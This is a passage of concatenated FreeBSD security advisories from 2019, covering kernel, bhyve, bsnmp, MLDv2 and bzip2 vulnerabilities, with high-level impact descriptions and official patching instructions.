releng/11.2/ r351260 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1d58xfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cJ3pw//fbHMCysvmMh+2RZ47d4i9d61cdYEq51VUwT2Cp2pGz+mWAoac89c4k2v coo+nuvsXfgNGjr6SHGjLw0kCjeJPdPBDstHLnrzqbmuUFeS8rbRS9AGy
FreeBSD Security Advisory FreeBSD-SA-19:24.mqueuefs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:24.mqueuefs Security Advisory The FreeBSD Project Topic: Reference count overflow in mqueue filesystem 32-bit compat Category: core Module: kernel Announced: 2019-08-20 Credits:Karsten König, Secfault Security Affects:All supported versions of FreeBSD. Corrected: 2019-08-20 17:45:22 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:51:32 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-20 17:46:22 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:51:32 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:51:32 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5603 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. Note: This issue is related to the previously disclosed SA-19:15.mqueuefs. It is another instance of the same bug and as such shares the same CVE. I. Background mqueuefs(5) implements POSIX message queue file system which can be used by processes as a communication mechanism. 'struct file' represents open files, directories, sockets and other entities. II. Problem Description System calls operating on file descriptors obtain a reference to relevant struct file which due to a programming error was not always put back, which in turn could be used to overflow the counter of affected struct file. III. Impact A local user can use this flaw to obtain access to files, directories, sockets, etc., opened by processes owned by other users. If obtained struct file represents a directory from outside of user's jail, it can be used to access files outside of the jail. If the user in question is a jailed root they can obtain root privileges on the host system. IV. Workaround No workaround is available. Note that the mqueuefs file system is not enabled by default. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch # fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch.asc # gpg --verify mqueuefs.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r351255 releng/12.0/ r351261 stable/11/r351257 releng/11.3/ r351261 releng/11.2/ r351261 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:24.mqueuefs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPglfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIKGA/+Oh+ORvFs273SJwaYaf8LCJ21IJnzVxDp9vS6MSO79LmI6HeiqAy9apQs Ec4zOXvE5MzYfA+E9jyRa6c4h7OY7uSSym15wCjLLi+DWPJ1lcCPAv01JuAgSw9E GkLOprdk2a
FreeBSD Security Advisory FreeBSD-SA-19:23.midi
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:23.midi Security Advisory The FreeBSD Project Topic: kernel memory disclosure from /dev/midistat Category: core Module: sound Announced: 2019-08-20 Credits:Peter Holm, Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5612 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background /dev/midistat is a device file which can be read to obtain a human-readable list of the available MIDI-capable devices in the system. II. Problem Description The kernel driver for /dev/midistat implements a handler for read(2). This handler is not thread-safe, and a multi-threaded program can exploit races in the handler to cause it to copy out kernel memory outside the boundaries of midistat's data buffer. III. Impact The races allow a program to read kernel memory within a 4GB window centered at midistat's data buffer. The buffer is allocated each time the device is opened, so an attacker is not limited to a static 4GB region of memory. On 32-bit platforms, an attempt to trigger the race may cause a page fault in kernel mode, leading to a panic. IV. Workaround No workaround is available. Custom kernels without "device sound" are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc # gpg --verify midi.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r351264 releng/12.0/ r351260 stable/11/r351265 releng/11.3/ r351260 releng/11.2/ r351260 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPgVfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cItmQ/9HL5BIP/QUvfcBbhZmZAXa7O7V9Em4auumaUWEPnUaAR0vNKZqMvFXNeN v51/HOwCZte2fCgs8rxSH9ncQR+cUk/3nXO7PZ7pNPNfvuJoPlCV1rIuRrdwm14+ +pZIJpY65gmmXyh5Qa5cw41MEWuDcKluUg38zEROwBpX4h0J/ZuMSARn/s1jj/kJ hy2yzgPTz8gAzkNd8OtQm1CHdFnKWabuAHBlltj9qIA3OvJL+TpIFmzU5jA7wO1n w9GCcz73+IA1RZXu8vPsW9AEc/1LlUrNcyLmJ+bZjW9b7mY9dq+ackvULTzFV21u 5xW2FEX3EBr3kFSbWyIS9zuTX4InftoAr97CBxNMYa25/0En4Ri2rB3oH49
FreeBSD Security Advisory FreeBSD-SA-19:22.mbuf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:22.mbuf Security Advisory The FreeBSD Project Topic: IPv6 remote Denial-of-Service Category: kernel Module: net Announced: 2019-08-20 Credits:Clement Lecigne Affects:All supported versions of FreeBSD. Corrected: 2019-08-10 00:01:25 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:49:33 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-10 00:02:45 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:49:33 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:49:33 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5611 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background mbufs are a unit of memory management mostly used in the kernel for network packets and socket buffers. m_pulldown(9) is a function to arrange the data in a chain of mbufs. II. Problem Description Due do a missing check in the code of m_pulldown(9) data returned may not be contiguous as requested by the caller. III. Impact Extra checks in the IPv6 code catch the error condition and trigger a kernel panic leading to a remote DoS (denial-of-service) attack with certain Ethernet interfaces. At this point it is unknown if any other than the IPv6 code paths can trigger a similar condition. IV. Workaround For the currently known attack vector systems with IPv6 not enabled are not vulnerable. On systems with IPv6 active, IPv6 fragmentation may be disabled, or a firewall can be used to filter out packets with certain or excessive amounts of extension headers in a first fragment. These rules may be dependent on the operational needs of each site. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch # fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch.asc # gpg --verify mbuf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350828 releng/12.0/ r351259 stable/11/r350829 releng/11.3/ r351259 releng/11.2/ r351259 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=238787> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5611> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:22.mbuf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPgFfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK+4w/7BCGyLpeSCIaHMpKdZvSqKc6RptLyxPq1q6XO/5fUxQiBXuwxfZIUO45o VyQCsuVf0QDeT/HaMJAdTr450RlSs1ozyzEmd2iLfwqmpc8JRemihrzHkNMfny1U Y4ffN6zyrOLyFeyQcdbgHUKHwuAvGZFhR/PtPJfWDmULi0vW5PHBGjxOQmxKbbUr 6zcR+gKrm5E3vLW4vD2gvsB1RGyOzUBOaEeQU36LE1/W6hhgwtXAkZacEP+W4BiB jP
FreeBSD Security Advisory FreeBSD-SA-19:21.bhyve
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:21.bhyve Security Advisory The FreeBSD Project Topic: Insufficient validation of guest-supplied data (e1000 device) Category: core Module: bhyve Announced: 2019-08-06 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2019-08-05 22:04:16 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:13:17 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-08-05 22:04:16 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:13:17 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:13:17 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2019-5609 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background bhyve(8) is a hypervisor that supports running a variety of guest operating systems in virtual machines. bhyve(8) includes an emulated Intel 82545 network interface adapter ("e1000"). II. Problem Description The e1000 network adapters permit a variety of modifications to an Ethernet packet when it is being transmitted. These include the insertion of IP and TCP checksums, insertion of an Ethernet VLAN header, and TCP segmentation offload ("TSO"). The e1000 device model uses an on-stack buffer to generate the modified packet header when simulating these modifications on transmitted packets. When TCP segmentation offload is requested for a transmitted packet, the e1000 device model used a guest-provided value to determine the size of the on-stack buffer without validation. The subsequent header generation could overflow an incorrectly sized buffer or indirect a pointer composed of stack garbage. III. Impact A misbehaving bhyve guest could overwrite memory in the bhyve process on the host. IV. Workaround Only the e1000 device model is affected; the virtio-net device is not affected by this issue. If supported by the guest operating system presenting only the virtio-net device to the guest is a suitable workaround. No workaround is available if the e1000 device model is required. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and restart any affected virtual machines. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch # fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch.asc # gpg --verify bhyve.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable virtual machines, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350619 releng/12.0/ r350647 stable/11/r350619 releng/11.3/ r350647 releng/11.2/ r350647 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5609> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:21.bhyve.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54
FreeBSD Security Advisory FreeBSD-SA-19:20.bsnmp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:20.bsnmp Security Advisory The FreeBSD Project Topic: Insufficient message length validation in bsnmp library Category: contrib Module: bsnmp Announced: 2019-08-06 Credits:Guido Vranken Affects:All supported versions of FreeBSD. Corrected: 2019-08-06 16:11:16 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:12:17 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-08-06 16:12:43 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:12:17 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:12:17 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2019-5610 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bsnmp software library is used for the Internet SNMP (Simple Network Management Protocol). As part of this it includes functions to handle ASN.1 (Abstract Syntax Notation One). II. Problem Description A function extracting the length from type-length-value encoding is not properly validating the submitted length. III. Impact A remote user could cause, for example, an out-of-bounds read, decoding of unrelated data, or trigger a crash of the software such as bsnmpd resulting in a denial of service. IV. Workaround No workaround is available. V. Solution Perform one of the following: Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch # fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch.asc # gpg --verify bsnmp.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350637 releng/12.0/ r350646 stable/11/r350638 releng/11.3/ r350646 releng/11.2/ r350646 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5610> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:20.bsnmp.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1lfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKtBBAAltxFzxuMqWCgJoL9SemLRQxGGk0hRFdN5b78mgVdk2lfDgVz8U7mVM6v XbcCa4lIy7wMYpUdEySAZLR2ENt0xdpx7oQ6lAg5fnnvrUvom4wU9ruxEs5txFVL K6RaJnQJyOkI2c/LYvI/ZYmuc29/Nt3p/DvVe7wq86taoqUufN11MXkrRHgn68N3 7vewixzWpqH5L/aY2qP1d+Xe3QmHX0IcFqeo4U3/3G4wUGRCfHtaENY4w5eUbCa2 1Qk0oS9iUdX1IJjM5l1ccoFqsjbcO6vNS337qeYNKhLspXMQPwoS0K0HfB6LKt1D dCBFoXu/qUFjf3qqbpcqGEFrFPZjlNmC4R0Ngx1rfZ1t1dXbj83NOOE1okd3Gb/V TPDU/jzwt+/6DE6ryNQpeanPdim83w/j+qeA0UaTyxlbj+oSz1gU9Ckaauf+9peI GT8TPnrgmFlYg2tkYl4tbq5LtRstPGZYguqEt5SHCxBOg3dxByMPzikSFUL9oNxS 9GX7JZT36J20f62hG8Watp2y3W0QsMjJpxF9OojRU6B15Z4Q2aCht4F6DnvEkVfN 1GvS5NAHPHU09TniSgYK3ThkoYrLYykhsXPmJmETV7DU1Qhny1p8H0NwIwB20DEm
FreeBSD Security Advisory FreeBSD-SA-19:19.mldv2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:19.mldv2 Security Advisory The FreeBSD Project Topic: ICMPv6 / MLDv2 out-of-bounds memory access Category: core Module: net Announced: 2019-08-06 Credits:CJD of Apple Affects:All supported versions of FreeBSD. Corrected: 2019-08-06 17:13:41 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:11:17 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-08-06 17:15:46 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:11:17 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:11:17 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2019-5608 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background MLDv2 is the Multicast Listener Discovery protocol, version 2. It is used by IPv6 routers to discover multicast listeners. II. Problem Description The ICMPv6 input path incorrectly handles cases where an MLDv2 listener query packet is internally fragmented across multiple mbufs. III. Impact A remote attacker may be able to cause an out-of-bounds read or write that may cause the kernel to attempt to access an unmapped page and subsequently panic. IV. Workaround No workaround is available. Systems not using IPv6 are not affected. V. Solution Perform one of the following: Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Reboot for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2, FreeBSD 11.3] # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch.asc # gpg --verify mldv2.11.patch.asc [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch.asc # gpg --verify mldv2.12.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350648 releng/12.0/ r350644 stable/11/r350650 releng/11.3/ r350644 releng/11.2/ r350644 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5608> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:19.mldv2.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1RfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLzTA/+OyyukXWH7rfwMhOlpD60UH4hxN3purvdNeBe4ZxlYvtf8gSUzS1VbK5r NR9D2HiYRlmaePOil5myan6cVkrKoANoWTrQsCcsFLe6KKbiKlQDx/btbENmCMsR VoS0ZPx3l9iGuVUwDk6k1JXwKCcO3U3dCDYEI941hEKxYadR+twUP3JOceg8Zn0h oODXW7LcPXWQKAyFc0Kun1VrjrUGdRGfqk30joR20GP2IjgQceFHKUbiOyBbbIjW +UVvp2wPBxXvcXNPTpcIpTW5UGJBHCT2OsDulh7hqpiWf78VE8BoksKAvDjtI4i0 15fmwn7tmQ3aGWK3WoaKWUOXZUlKrxRQDzGyAZ3LzOqPWhv12tJjNJhjnRmCVLfo +F4I/MHzPgjitZhv8gfn+MRiPG4E1ueAYnPQWiR3qRCLQGhemVdKZIAVnYg6NGpQ Jgsr1QS8/3GH
FreeBSD Security Advisory FreeBSD-SA-19:18.bzip2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:18.bzip2 Security Advisory The FreeBSD Project Topic: Multiple vulnerabilities in bzip2 Category: contrib Module: bzip2 Announced: 2019-08-06 Affects:All supported versions of FreeBSD. Corrected: 2019-07-04 07:29:18 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:09:47 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-07-04 07:32:25 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:09:47 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:09:47 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2016-3189, CVE-2019-12900 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bzip2(1)/bunzip2(1) utilities and the libbz2 library compress and decompress files using an algorithm based on the Burrows-Wheeler transform. They are generally slower than Lempel-Ziv compressors such as gzip, but usually provide a greater compression ratio. The bzip2recover utility extracts blocks from a damaged bzip2(1) file, permitting partial recovery of the contents of the file. II. Problem Description The decompressor used in bzip2 contains a bug which can lead to an out-of-bounds write when processing a specially crafted bzip2(1) file. bzip2recover contains a heap use-after-free bug which can be triggered when processing a specially crafted bzip2(1) file. III. Impact An attacker who can cause maliciously crafted input to be processed may trigger either of these bugs. The bzip2recover bug may cause a crash, permitting a denial-of-service. The bzip2 decompressor bug could potentially be exploited to execute arbitrary code. Note that some utilities, including the tar(1) archiver and the bspatch(1) binary patching utility (used in portsnap(8) and freebsd-update(8)) decompress bzip2(1)-compressed data internally; system administrators should assume that their systems will at some point decompress bzip2(1)-compressed data even if they never explicitly invoke the bunzip2(1) utility. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and restart daemons if necessary. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch # fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch.asc # gpg --verify bzip2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349717 releng/12.0/ r350643 stable/11/r349718 releng/11.3/ r350643 releng/11.2/ r350643 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3189> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12900> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:18.bzip2.asc> -BEGIN PGP SIGNATURE--
FreeBSD Security Advisory FreeBSD-SA-19:16.bhyve
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:16.bhyve Security Advisory The FreeBSD Project Topic: Bhyve out-of-bounds read in XHCI device Category: core Module: bhyve Announced: 2019-07-24 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2019-07-23 17:48:37 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:56:06 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-23 17:48:37 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:56:06 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:56:06 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5604 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background bhyve(8) is a hypervisor that supports running a variety of virtual machines (guests). bhyve includes an emulated XHCI device. II. Problem Description The pci_xhci_device_doorbell() function does not validate the 'epid' and 'streamid' provided by the guest, leading to an out-of-bounds read. III. Impact A misbehaving bhyve guest could crash the system or access memory that it should not be able to. IV. Workaround No workaround is available, however systems not using bhyve(8) for virtualization are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. No reboot is required. Rather the bhyve(8) process for vulnerable virtual machines should be restarted. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Restart any bhyve virtual machines or reboot the system. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch # fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch.asc # gpg --verify bhyve.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart any bhyve virtual machines, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350246 releng/12.0/ r350285 stable/11/r350247 releng/11.2/ r350285 releng/11.3/ r350285 - - To see which files were modified by a particular 